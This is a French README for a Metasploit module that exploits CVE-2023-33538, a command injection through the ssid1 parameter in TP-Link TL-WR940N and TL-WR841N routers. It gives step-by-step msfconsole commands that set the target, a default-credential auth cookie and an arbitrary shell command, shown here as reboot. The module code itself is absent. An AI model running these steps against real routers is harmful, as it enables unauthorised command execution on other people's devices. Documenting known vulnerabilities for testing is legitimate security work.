
CVE-2023-33538 - Module Ruby d'injection de commande TP-Link pour Metasploit Framework
Ce module auxiliaire Metasploit cible une vulnérabilité d'injection de commande authentifiée dans les routeurs TP-Link TL-WR940N V2/V4 et TL-WR841N V8/V10.
Le problème réside dans le paramètre vulnérable ssid1 utilisé dans WlanNetworkRpm.htm, qui permet l'injection de commandes shell arbitraires.
En cas de succès, il permet à l'attaquant d'exécuter des commandes arbitraires sur l'appareil.
Plus d'informations sur la CVE :
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
.rb dans votre dossier de modules Metasploit, par exemple :cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
msfconsole
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
Le module n'effectue pas l'authentification. Vous devez extraire manuellement le cookie
Authorizationet le préfixe de session d'une connexion réussie à l'interface web du routeur.
Ce module est destiné uniquement à des fins éducatives.
N'utilisez pas ce code contre des appareils ou des infrastructures dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test.
Si vous trouvez des bogues ou avez des idées d'amélioration – n'hésitez pas à ouvrir une issue ou à laisser un commentaire.